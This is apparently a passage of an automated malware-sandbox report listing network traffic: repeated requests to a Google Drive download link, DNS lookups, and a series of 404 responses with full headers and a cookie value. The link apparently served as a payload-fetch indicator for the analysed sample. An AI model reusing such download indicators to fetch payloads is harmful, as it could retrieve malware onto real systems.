      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6MDHQ11rPu1adBbHNkRayT-uroBYsCNflam6rz9IHkAO_KzEyDBJqdZn4d52xK9kLN-mrz51UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:59 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QRH0QhO-P5se56J6v6NGyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi; expires=Sat, 12-Jul-2025 14:16:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTPHlsYCxQBD3XByofZQWkU5v1TPsazJ89RGxp252ILNsba_MXvZblxohrhj1l3KoxhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0to7DuxX24XE9i3F2cPFMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTCXI2RpCHyS7wW4CS3AQvmV2M-wFk1LE_rCJqmrG31kI_KotDqxZzNnlFv87il8FKV7IwmxeMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-4c5VbNs3s2yayQ42twrFaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTDd2LXSrTX-FsSt6rvNAsoI1OmBad156y6ASntf6p5_kjNxsz_uEONOyxruF1Do7WQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-cpcDJH9Oq3Uh8pgUAN6yJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRUz2FZIkOfgU2aeRyQlw5lPPsaLEp_bq5g_wWDlyC2Sl1Seo2ZK5Mst5n6l-Yz6chmkiAMhmEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:35 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZfsrMncR0JDfXumceUBEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSl9bKnFmla5yI3jftmUGd5Y01uJ_87WEoaqxjNAIiJTBK-u85HW1ZY3hjaiJOk282wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-vpoGtNTFVBEq09nPPrHhPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ-nzvoC-4Y3YrNEtD6IjLPj8vWDW6UeEprxZZPFR_fpsxJH9ZauF2vRGNa4ash7M19P74EslMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:40 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-PsAKkt8JSluzSuCkRnObUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT82xnqDMXBe2NQBSTh0KXnC2SFPzxHYbugdGAhCPmRUN84c0JF2ijRI8qU80jplHR28k_JWm0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-psnLVJ-QUzYvu4-bzGkMdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR5T5IIBNlAu68id9NUqC8TCjv0seuOtJIzS6MwKA9Hv5G2OqtoT7eu8hVXQX-TOKhWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Dp2O-2xiLaCnMIibsL5aCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTxSlOmU4DobgMLJHY5ZLRCrtUUgJZTp2ff0-MlYwgJ6caztQ7ZmKKrXMDSA6R7GqQDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-ZRvmgYKfVQ5WOzv31RZhNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSbwdyUoSymxYKtHHdic_Ln2lYlrm9VLVNdZwQLSpjFhlyI3OrxGkUxz69Ck01WM1MZpbrS3ksContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-xb16yI02nCRC5dwUZV5yrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gBihxxOlikXi1zu7p4tQrKQ1Uk830iyhrIcjeGwfstEuABXOrAC1vp-SBJukU7lpWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-jbWxc-j2sUDVkQMuonLMEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTtAQENBuXRdqDUMJSYeG1fS_K-olX84LV8S0Yif-y82c9qG_q0AvKrOsGgkyLzsu4Z3rwUkjMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:54 GMTContent-Security-Policy: script-src 'nonce-1V457p-AtP3OzN67UpQIXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, 